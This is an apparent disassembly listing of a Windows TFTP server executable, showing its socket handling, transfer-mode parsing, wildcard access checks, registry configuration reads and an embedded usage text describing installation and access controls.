mov [ebp+var_28], 2
call dword_1001124 ; bind
test eax, eax
jz short loc_10031A3
loc_1003191: ; CODE XREF: sub_1002F31+23C�j
call dword_10010F8 ; WSAGetLastError
loc_1003197: ; CODE XREF: sub_1002F31+226�j
push offset aInsufficientRe ; "Insufficient resources"
push 0
jmp loc_10032FA
; ---------------------------------------------------------------------------
loc_10031A3: ; CODE XREF: sub_1002F31+25E�j
push ebx
mov [esi+8], edi
call dword_1001044 ; InitializeCriticalSection
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+var_8], esi
movsd
movsd
movsd
movsd
xor edi, edi
push edi
push edi
push edi
push edi
call dword_1001040 ; CreateEventA
cmp eax, edi
mov [ebx+0FFF8h], eax
jz short loc_10031E8
push 2
push eax
push [ebp+var_4]
call sub_100188E
cmp eax, edi
mov [ebx+0FFFCh], eax
jnz short loc_10031F3
loc_10031E8: ; CODE XREF: sub_1002F31+2A0�j
call dword_1001038 ; RtlGetLastWin32Error
jmp loc_1003312
; ---------------------------------------------------------------------------
loc_10031F3: ; CODE XREF: sub_1002F31+2B5�j
add ebx, 18h
push ebx
call sub_100287F
push 1
pop esi
push [ebp+var_4]
mov [ebp+var_14], esi
call sub_10028B5
mov ebx, eax
cmp ebx, edi
jz loc_1003312
lea edi, [ebx+10028h]
lea eax, [ebx+38h]
push edi
push eax
lea eax, [ebx+10024h]
mov [ebp+var_10], esi
push eax
mov eax, [ebp+var_C]
push esi
mov esi, [ebp+arg_0]
inc eax
push eax
push esi
call sub_10023D8
test eax, eax
jnz loc_1003312
cmp [edi], eax
jz short loc_1003255
mov eax, [esi+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_100325F
; ---------------------------------------------------------------------------
loc_1003255: ; CODE XREF: sub_1002F31+311�j
mov dword ptr [ebx+10000h], 3E8h
loc_100325F: ; CODE XREF: sub_1002F31+322�j
mov eax, [ebx+10000h]
push 0
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call dword_1001178 ; RtlCreateTimer
push 1
pop edi
mov [ebx+24h], edi
mov eax, [esi+20h]
push esi
push ebx
mov [ebx+10018h], eax
mov [ebx+10014h], di
call sub_10027E1
push 10h
xor ecx, ecx
push [ebp+var_8]
cmp eax, ecx
mov [ebx+1000Ch], ecx
push ecx
push dword ptr [ebx+10020h]
jz short loc_10032D9
lea eax, [ebx+38h]
push eax
push [ebp+var_4]
call dword_1001130 ; sendto
mov ecx, [ebx+1001Ch]
cmp ecx, [esi+20h]
jnb short loc_10032E9
mov [ebx+10030h], edi
jmp short loc_10032E9
; ---------------------------------------------------------------------------
loc_10032D9: ; CODE XREF: sub_1002F31+386�j
add esi, 0FFF1h
push esi
push [ebp+var_4]
call dword_1001130 ; sendto
loc_10032E9: ; CODE XREF: sub_1002F31+39E�j
; sub_1002F31+3A6�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003312
call dword_10010F8 ; WSAGetLastError
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_10032F6: ; CODE XREF: sub_1002F31+100�j
push 0
push 4
loc_10032FA: ; CODE XREF: sub_1002F31+26D�j
push dword ptr [esi+8]
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax
push esi
loc_1003308: ; CODE XREF: sub_1002F31+1E0�j
call sub_100230A
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_100330F: ; CODE XREF: sub_1002F31+27�j
mov ebx, [ebp+arg_0]
loc_1003312: ; CODE XREF: sub_1002F31+2BD�j
; sub_1002F31+2DD�j ...
test ebx, ebx
jz short loc_1003331
cmp [ebp+var_10], 0
jz short loc_1003323
push ebx
call dword_100104C ; RtlLeaveCriticalSection
loc_1003323: ; CODE XREF: sub_1002F31+3E9�j
cmp [ebp+var_14], 0
jnz short loc_1003331
push ebx
call dword_10010A0 ; free
pop ecx
loc_1003331: ; CODE XREF: sub_1002F31+50�j
; sub_1002F31+3E3�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_1002F31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100333A proc near ; DATA XREF: sub_1001A91+20F�o
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
and [ebp+var_10], 0
and [ebp+var_14], 0
push ebx
push esi
push edi
push 10034h
call dword_1001094 ; malloc
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003731
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
push 0FFBAh
rep stosd
mov eax, [ebp+arg_0]
lea esi, [eax+36h]
push esi
mov [ebp+var_4], esi
call sub_1002F0E
test eax, eax
jz loc_1003712
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [ebp+arg_0]
not ecx
push dword ptr [edi+10h]
dec ecx
lea esi, [ecx+esi+1]
call dword_1001120 ; inet_ntoa
mov [ebp+var_18], eax
mov ax, [edi+0Eh]
push eax
call dword_1001104 ; ntohs
cmp byte ptr [esi], 0
mov edi, esi
mov [ebp+var_C], edi
jz short loc_10033E1
loc_10033BC: ; CODE XREF: sub_100333A+A2�j
movsx eax, byte ptr [edi]
push eax
call dword_100114C ; isupper
test eax, eax
movsx eax, byte ptr [edi]
pop ecx
jz short loc_10033D6
push eax
call dword_1001150 ; tolower
pop ecx
loc_10033D6: ; CODE XREF: sub_100333A+92�j
mov [edi], al
inc edi
cmp byte ptr [edi], 0
jnz short loc_10033BC
mov [ebp+var_C], edi
loc_10033E1: ; CODE XREF: sub_100333A+80�j
mov eax, offset aNetascii ; "netascii"
mov edi, esi
loc_10033E8: ; CODE XREF: sub_100333A+CA�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100340A
test cl, cl
jz short loc_1003406
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100340A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_10033E8
loc_1003406: ; CODE XREF: sub_100333A+B8�j
xor eax, eax
jmp short loc_100340F
; ---------------------------------------------------------------------------
loc_100340A: ; CODE XREF: sub_100333A+B4�j
; sub_100333A+C2�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100340F: ; CODE XREF: sub_100333A+CE�j
test eax, eax
jnz short loc_100341F
mov dword ptr [ebx+10030h], 4000h
jmp short loc_100345D
; ---------------------------------------------------------------------------
loc_100341F: ; CODE XREF: sub_100333A+D7�j
mov edi, offset aOctet ; "octet"
loc_1003424: ; CODE XREF: sub_100333A+106�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_1003446
test al, al
jz short loc_1003442
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_1003446
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_1003424
loc_1003442: ; CODE XREF: sub_100333A+F4�j
xor eax, eax
jmp short loc_100344B
; ---------------------------------------------------------------------------
loc_1003446: ; CODE XREF: sub_100333A+F0�j
; sub_100333A+FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100344B: ; CODE XREF: sub_100333A+10A�j
test eax, eax
jnz loc_10036F8
mov dword ptr [ebx+10030h], 8000h
loc_100345D: ; CODE XREF: sub_100333A+E3�j
mov eax, [ebp+arg_0]
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
lea edx, [eax+1FFADh]
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+var_8], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_100349A
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10034DF
; ---------------------------------------------------------------------------
loc_100349A: ; CODE XREF: sub_100333A+157�j
push [ebp+var_18]
push offset dword_1005D20
call sub_10039D6
test eax, eax
jz loc_10036EC
push [ebp+var_4]
push offset dword_1005D90
call sub_10039D6
test eax, eax
jz loc_10036EC
push (offset dword_1005E07+1)
push 0FFBCh
push [ebp+var_8]
call sub_100273D
test eax, eax
jnz short loc_10034E6
push offset aFileNameTooLon ; "File name too long"
loc_10034DF: ; CODE XREF: sub_100333A+15E�j
push 0
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_10034E6: ; CODE XREF: sub_100333A+19E�j
push 180h
push 8302h
push [ebp+var_8]
call dword_10010E4 ; _open
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+1002Ch], eax
jnz short loc_100351E
mov esi, dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
jmp loc_10036F2
; ---------------------------------------------------------------------------
loc_100351E: ; CODE XREF: sub_100333A+1CB�j
xor esi, esi
push esi
push 2
push 2
call dword_100112C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_1003546
call dword_10010F8 ; WSAGetLastError
push offset aInsufficientRe ; "Insufficient resources"
push esi
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_1003546: ; CODE XREF: sub_100333A+1F9�j
mov [ebp+var_26], si
mov esi, [ebp+arg_0]
push 10h
mov [ebp+var_28], 2
mov eax, [esi+1Ch]
mov [ebp+var_24], eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_1001124 ; bind
test eax, eax
jz short loc_100358A
call dword_10010F8 ; WSAGetLastError
push offset aInsufficientRe ; "Insufficient resources"
push 0
push dword ptr [esi+8]
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax
push esi
jmp loc_100370D
; ---------------------------------------------------------------------------
loc_100358A: ; CODE XREF: sub_100333A+22E�j
lea eax, [ebx+10028h]
mov [esi+8], edi
push eax
lea eax, [ebx+38h]
push eax
lea eax, [ebx+10024h]
push eax
mov eax, [ebp+var_C]
inc eax
push 2
push eax
push esi
call sub_10023D8
test eax, eax
jnz loc_1003712
push ebx
call dword_1001044 ; InitializeCriticalSection
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+var_18], esi
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push esi
push esi
call dword_1001040 ; CreateEventA
cmp eax, esi
mov [ebx+0FFF8h], eax
jz short loc_10035F8
push 2
pop edi
push edi
push eax
push [ebp+var_4]
call sub_100188E
cmp eax, esi
mov [ebx+0FFFCh], eax
jnz short loc_1003603
loc_10035F8: ; CODE XREF: sub_100333A+2A5�j
call dword_1001038 ; RtlGetLastWin32Error
jmp loc_1003712
; ---------------------------------------------------------------------------
loc_1003603: ; CODE XREF: sub_100333A+2BC�j
add ebx, 18h
push ebx
call sub_100287F
push [ebp+var_4]
mov [ebp+var_14], 1
call sub_10028B5
mov ebx, eax
cmp ebx, esi
jz loc_1003712
xor esi, esi
mov [ebp+var_10], 1
cmp [ebx+10028h], esi
jz short loc_100364A
mov eax, [ebp+arg_0]
mov eax, [eax+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_1003654
; ---------------------------------------------------------------------------
loc_100364A: ; CODE XREF: sub_100333A+2FA�j
mov dword ptr [ebx+10000h], 3E8h
loc_1003654: ; CODE XREF: sub_100333A+30E�j
mov eax, [ebx+10000h]
push esi
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call dword_1001178 ; RtlCreateTimer
mov eax, [ebp+arg_0]
mov ecx, [ebx+10024h]
mov [ebx+24h], edi
cmp ecx, esi
mov eax, [eax+20h]
mov [ebx+10018h], eax
lea eax, [ebx+10024h]
jz short loc_10036A1
mov [ebx+10020h], ecx
mov [eax], esi
jmp short loc_10036C5
; ---------------------------------------------------------------------------
loc_10036A1: ; CODE XREF: sub_100333A+35B�j
mov esi, dword_1001104
push 4
pop edi
push edi
call esi ; dword_1001104
mov [ebx+38h], ax
mov ax, [ebx+10014h]
push eax
call esi ; dword_1001104
mov [ebx+3Ah], ax
mov [ebx+10020h], edi
loc_10036C5: ; CODE XREF: sub_100333A+365�j
push 10h
lea eax, [ebx+38h]
push [ebp+var_18]
push 0
push dword ptr [ebx+10020h]
push eax
push [ebp+var_4]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1003712
call dword_10010F8 ; WSAGetLastError
jmp short loc_1003712
; ---------------------------------------------------------------------------
loc_10036EC: ; CODE XREF: sub_100333A+16F�j
; sub_100333A+184�j
call dword_10010AC ; _errno
loc_10036F2: ; CODE XREF: sub_100333A+1DF�j
push 0
push 2
jmp short loc_10036FC
; ---------------------------------------------------------------------------
loc_10036F8: ; CODE XREF: sub_100333A+113�j
push 0
push 4
loc_10036FC: ; CODE XREF: sub_100333A+1A7�j
; sub_100333A+207�j ...
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx
push eax
loc_100370D: ; CODE XREF: sub_100333A+24B�j
call sub_100230A
loc_1003712: ; CODE XREF: sub_100333A+48�j
; sub_100333A+274�j ...
test ebx, ebx
jz short loc_1003731
cmp [ebp+var_10], 0
jz short loc_1003723
push ebx
call dword_100104C ; RtlLeaveCriticalSection
loc_1003723: ; CODE XREF: sub_100333A+3E0�j
cmp [ebp+var_14], 0
jnz short loc_1003731
push ebx
call dword_10010A0 ; free
pop ecx
loc_1003731: ; CODE XREF: sub_100333A+21�j
; sub_100333A+3DA�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_100333A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100373A proc near ; CODE XREF: sub_1002CE6+D7�p
var_1FF70 = byte ptr -1FF70h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1FF70h
call sub_1003A3E ; _chkstk
cmp [ebp+arg_C], 8000h
push esi
push edi
jnz short loc_100375A
push [ebp+arg_8]
push [ebp+arg_4]
jmp short loc_1003792
; ---------------------------------------------------------------------------
loc_100375A: ; CODE XREF: sub_100373A+16�j
mov edx, [ebp+arg_4]
xor ecx, ecx
xor esi, esi
cmp [ebp+arg_8], ecx
jle short loc_1003790
mov edi, [ebp+arg_10]
loc_1003769: ; CODE XREF: sub_100373A+54�j
cmp byte ptr [edi], 0Dh
jnz short loc_1003779
cmp byte ptr [ecx+edx], 0
jnz short loc_1003779
and byte ptr [edi], 0
jmp short loc_100378A
; ---------------------------------------------------------------------------
loc_1003779: ; CODE XREF: sub_100373A+32�j
; sub_100373A+38�j
mov al, [ecx+edx]
mov [ebp+esi+var_1FF70], al
inc esi
cmp al, 0Dh
jnz short loc_100378A
mov [edi], al
loc_100378A: ; CODE XREF: sub_100373A+3D�j
; sub_100373A+4C�j
inc ecx
cmp ecx, [ebp+arg_8]
jl short loc_1003769
loc_1003790: ; CODE XREF: sub_100373A+2A�j
push esi
push edx
loc_1003792: ; CODE XREF: sub_100373A+1E�j
push [ebp+arg_0]
call dword_10010E8 ; _write
mov edi, eax
add esp, 0Ch
cmp edi, 0FFFFFFFFh
jnz short loc_10037B7
mov esi, dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
loc_10037B7: ; CODE XREF: sub_100373A+69�j
mov eax, edi
pop edi
pop esi
leave
retn 14h
sub_100373A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10037BF proc near ; CODE XREF: sub_1001665:loc_10017F3�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push ebx
xor ebx, ebx
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
push 80000002h
mov [ebp+var_4], ebx
call dword_1001000 ; RegOpenKeyExA
cmp eax, ebx
jz short loc_10037F6
call dword_1001038 ; RtlGetLastWin32Error
xor eax, eax
jmp loc_100390D
; ---------------------------------------------------------------------------
loc_10037F6: ; CODE XREF: sub_10037BF+28�j
cmp byte ptr dword_1005E07+1, bl
push edi
push esi
mov esi, dword_1001008
jnz short loc_100383C
lea eax, [ebp+var_8]
mov [ebp+var_8], 1F4h
push eax
lea eax, [ebp+var_C]
push (offset dword_1005E07+1)
push eax
push ebx
push offset aDirectory ; "directory"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003831
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100383C
; ---------------------------------------------------------------------------
loc_1003831: ; CODE XREF: sub_10037BF+68�j
push 1
pop eax
cmp [ebp+var_C], eax
jnz short loc_100383C
mov [ebp+var_4], eax
loc_100383C: ; CODE XREF: sub_10037BF+45�j
; sub_10037BF+70�j ...
push 32h
lea eax, [ebp+var_8]
pop edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005CE8
push eax
push ebx
push offset aClients ; "clients"
push [ebp+var_10]
mov [ebp+var_8], edi
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003866
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100386F
; ---------------------------------------------------------------------------
loc_1003866: ; CODE XREF: sub_10037BF+9D�j
cmp [ebp+var_C], 1
jnz short loc_100386F
inc [ebp+var_4]
loc_100386F: ; CODE XREF: sub_10037BF+A5�j
; sub_10037BF+AB�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D20
push eax
push ebx
push offset aMasters ; "masters"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003896
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100389F
; ---------------------------------------------------------------------------
loc_1003896: ; CODE XREF: sub_10037BF+CD�j
cmp [ebp+var_C], 1
jnz short loc_100389F
inc [ebp+var_4]
loc_100389F: ; CODE XREF: sub_10037BF+D5�j
; sub_10037BF+DB�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D58
push eax
push ebx
push offset aReadable ; "readable"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_10038C6
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_10038CF
; ---------------------------------------------------------------------------
loc_10038C6: ; CODE XREF: sub_10037BF+FD�j
cmp [ebp+var_C], 1
jnz short loc_10038CF
inc [ebp+var_4]
loc_10038CF: ; CODE XREF: sub_10037BF+105�j
; sub_10037BF+10B�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D90
push eax
push ebx
push offset aWritable ; "writable"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_10038F6
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_10038FF
; ---------------------------------------------------------------------------
loc_10038F6: ; CODE XREF: sub_10037BF+12D�j
cmp [ebp+var_C], 1
jnz short loc_10038FF
inc [ebp+var_4]
loc_10038FF: ; CODE XREF: sub_10037BF+135�j
; sub_10037BF+13B�j
push [ebp+var_10]
call dword_100100C ; RegCloseKey
mov eax, [ebp+var_4]
pop esi
pop edi
loc_100390D: ; CODE XREF: sub_10037BF+32�j
pop ebx
leave
retn
sub_10037BF endp
; =============== S U B R O U T I N E =======================================
sub_1003910 proc near ; CODE XREF: sub_1001665+193�p
var_1F4 = byte ptr -1F4h
sub esp, 1F4h
cmp byte ptr dword_1005E07+1, 0
push ebx
push ebp
push esi
push edi
mov ebp, 1F4h
mov ebx, (offset dword_1005E07+1)
jnz short loc_100393D
push ebp
push offset aTftpdroot ; "\\tftpdroot\\"
push ebx
call dword_1001148 ; strncpy
add esp, 0Ch
loc_100393D: ; CODE XREF: sub_1003910+1B�j
lea eax, [esp+204h+var_1F4]
push ebp
push eax
push ebx
call dword_1001020 ; ExpandEnvironmentStringsA
test eax, eax
jnz short loc_1003952
push 57h
jmp short loc_10039CA
; ---------------------------------------------------------------------------
loc_1003952: ; CODE XREF: sub_1003910+3C�j
mov ecx, eax
lea esi, [esp+204h+var_1F4]
mov edi, ebx
or edx, 0FFFFFFFFh
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebx
mov ecx, edx
repne scasb
not ecx
dec ecx
cmp byte ptr dword_1005E07[ecx], 2Fh
lea eax, dword_1005E07[ecx]
jnz short loc_1003986
mov byte ptr [eax], 5Ch
loc_1003986: ; CODE XREF: sub_1003910+71�j
cmp byte ptr [eax], 5Ch
jz short loc_10039B7
cmp ecx, ebp
jnb short loc_10039B7
mov edi, offset asc_100155C ; "\\"
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebp, ecx
mov edi, ebx
mov ecx, edx
repne scasb
mov ecx, ebp
dec edi
shr ecx, 2
rep movsd
mov ecx, ebp
and ecx, 3
rep movsb
loc_10039B7: ; CODE XREF: sub_1003910+79�j
; sub_1003910+7D�j
mov edi, ebx
mov ecx, edx
xor eax, eax
push 1
repne scasb
not ecx
dec ecx
mov dword_1005FFC, ecx
loc_10039CA: ; CODE XREF: sub_1003910+40�j
pop eax
pop edi
pop esi
pop ebp
pop ebx
add esp, 1F4h
retn
sub_1003910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10039D6 proc near ; CODE XREF: sub_1002F31+148�p
; sub_1002F31+159�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov al, [esi]
test al, al
jz short loc_1003A2E
cmp al, 2Ah
jz short loc_1003A04
cmp al, 3Fh
jz short loc_10039F7
mov ecx, [ebp+arg_4]
cmp al, [ecx]
jnz short loc_1003A25
inc ecx
push ecx
jmp short loc_1003A01
; ---------------------------------------------------------------------------
loc_10039F7: ; CODE XREF: sub_10039D6+14�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jz short loc_1003A25
inc eax
push eax
loc_1003A01: ; CODE XREF: sub_10039D6+1F�j
inc esi
jmp short loc_1003A1B
; ---------------------------------------------------------------------------
loc_1003A04: ; CODE XREF: sub_10039D6+10�j
mov edi, [ebp+arg_4]
lea eax, [esi+1]
push edi
push eax
call sub_10039D6
test eax, eax
jnz short loc_1003A29
cmp [edi], al
jz short loc_1003A25
inc edi
push edi
loc_1003A1B: ; CODE XREF: sub_10039D6+2C�j
push esi
call sub_10039D6
test eax, eax
jnz short loc_1003A29
loc_1003A25: ; CODE XREF: sub_10039D6+1B�j
; sub_10039D6+27�j ...
xor eax, eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A29: ; CODE XREF: sub_10039D6+3D�j
; sub_10039D6+4D�j
push 1
pop eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A2E: ; CODE XREF: sub_10039D6+C�j
mov ecx, [ebp+arg_4]
xor eax, eax
cmp [ecx], al
setz al
loc_1003A38: ; CODE XREF: sub_10039D6+51�j
; sub_10039D6+56�j
pop edi
pop esi
pop ebp
retn 8
sub_10039D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A3E proc near ; CODE XREF: sub_1001A91+5�p
; sub_100230A+8�p ...
jmp dword_100116C
sub_1003A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A44 proc near ; CODE XREF: sub_10018DB+FE�p
; sub_1002219+DA�p
jmp dword_1001138
sub_1003A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A4A proc near ; CODE XREF: sub_1001FA6+1F�p
; sub_1001FA6+43�p
jmp dword_100113C
sub_1003A4A endp
; ---------------------------------------------------------------------------
loc_1003A50: ; CODE XREF: UPX1:01009168�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001560
push offset loc_1003BF0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
push 1
call dword_10010C4 ; __set_app_type
add esp, 4
mov dword_10062D0, 0FFFFFFFFh
mov dword_10062D4, 0FFFFFFFFh
call dword_10010C8 ; __p__fmode
mov ecx, dword_100600C
mov [eax], ecx
call dword_10010CC ; __p__commode
mov edx, dword_1006008
mov [eax], edx
mov eax, dword_10010D0
mov ecx, [eax]
mov dword_10062D8, ecx
call nullsub_2
mov eax, dword_1005DC4
test eax, eax
jnz short loc_1003AE1
push offset loc_1003BD0
call dword_1001084 ; __setusermatherr
add esp, 4
loc_1003AE1: ; CODE XREF: seg000:01003AD1�j
call sub_1003BB0
push offset dword_100500C
push offset dword_1005008
call sub_1003BA6 ; _initterm
add esp, 8
mov edx, dword_1006004
mov [ebp-28h], edx
lea eax, [ebp-28h]
push eax
mov ecx, dword_1006000
push ecx
lea edx, [ebp-20h]
push edx
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
push ecx
call dword_1001080 ; __getmainargs
add esp, 14h
push offset dword_1005004
push offset dword_1005000
call sub_1003BA6 ; _initterm
add esp, 8
call dword_10010D8 ; __p___initenv
mov edx, [ebp-20h]
mov [eax], edx
mov eax, [ebp-20h]
push eax
mov ecx, [ebp-2Ch]
push ecx
mov edx, [ebp-1Ch]
push edx
call sub_1001570
add esp, 0Ch
mov [ebp-24h], eax
push eax
call dword_10010EC ; exit
jmp short loc_1003B80
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call sub_1003BA0
add esp, 8
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov edx, [ebp-30h]
push edx
call dword ptr loc_10010DD+3
loc_1003B80: ; CODE XREF: seg000:01003B5C�j
add esp, 4
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BA0 proc near ; CODE XREF: seg000:01003B6A�p
jmp dword ptr loc_10010DC
sub_1003BA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BA6 proc near ; CODE XREF: seg000:01003AF0�p
; seg000:01003B2B�p
jmp dword_100107C
sub_1003BA6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1003BB0 proc near ; CODE XREF: seg000:loc_1003AE1�p
push 30000h
push 10000h
call sub_1003BF6 ; _controlfp
add esp, 8
retn
sub_1003BB0 endp
; ---------------------------------------------------------------------------
align 10h
loc_1003BD0: ; DATA XREF: seg000:01003AD3�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_1003BF0: ; DATA XREF: seg000:01003A5A�o
jmp dword ptr loc_10010C0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BF6 proc near ; CODE XREF: sub_1003BB0+A�p
jmp dword_10010BC
sub_1003BF6 endp
; ---------------------------------------------------------------------------
dd 501h dup(0)
dword_1005000 dd 0 dword_1005004 dd 0 dword_1005008 dd 0 dword_100500C dd 0 asc_1005010 db ' ================================================================'
; DATA XREF: sub_1001570+4D�o
db '======== ',0Ah
db 'Abstract: '
db ' ',0Ah
db ' This implements an RFC 783 tftp daemon. '
db ' ',0Ah
db ' It listens on port 69 for requests '
db ' ',0Ah
db ' and spawns a thread to process each request. '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'TFTPD USAGE and Installation: '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' md d:/tftpd (the StartDirec'
db 'tory). ',0Ah
db ' copy //MohsinA_p90/test/tftpd.exe . '
db ' ',0Ah
db ' sc create tftpd binPath= d:/tftpd/tftpd.exe (give full path'
db '). ',0Ah
db ' sc query tftpd (check if insta'
db 'lled). ',0Ah
db ' '
db ' ',0Ah
db 'Start: '
db ' ',0Ah
db ' sc start tftpd -f (creates a log '
db 'file). ',0Ah
db 'or sc start tftpd '
db ' ',0Ah
db 'or net start tftpd '
db ' ',0Ah
db 'or sc start tftpd [-dStartDirectory] [-e] [-f] '
db ' ',0Ah
db ' Options: -e use event log. '
db ' ',0Ah
db ' -f log to file. '
db ' ',0Ah
db ' -dStartDirectory '
db ' ',0Ah
db 'Info: '
db ' ',0Ah
db ' sc interrogate tftpd (logs will be updated). '
db ' ',0Ah
db ' sc query tftpd Check whether running. '
db ' ',0Ah
db 'Stop: '
db ' ',0Ah
db ' sc stop tftpd '
db ' ',0Ah
db ' net stop tftpd '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'Variables that control what files can be read/written and by whom'
db ': ',0Ah
db ' StartDirectory - only files there will be accessible. '
db ' ',0Ah
db ' LogFile is created here. '
db ' ',0Ah
db ' ValidClients - Clients matching this ip address can read files'
db '. ',0Ah
db ' eg. you can set it to "157.55.8?.*" '
db ' ',0Ah
db ' ValidMasters - clients matching this can write and read file'
db 's. ',0Ah
db ' eg. you can set it to "" and no one can write'
db '. ',0Ah
db ' ValidReadFiles - only matching files will be served out, eg. "'
db 'r*.t?t"',0Ah
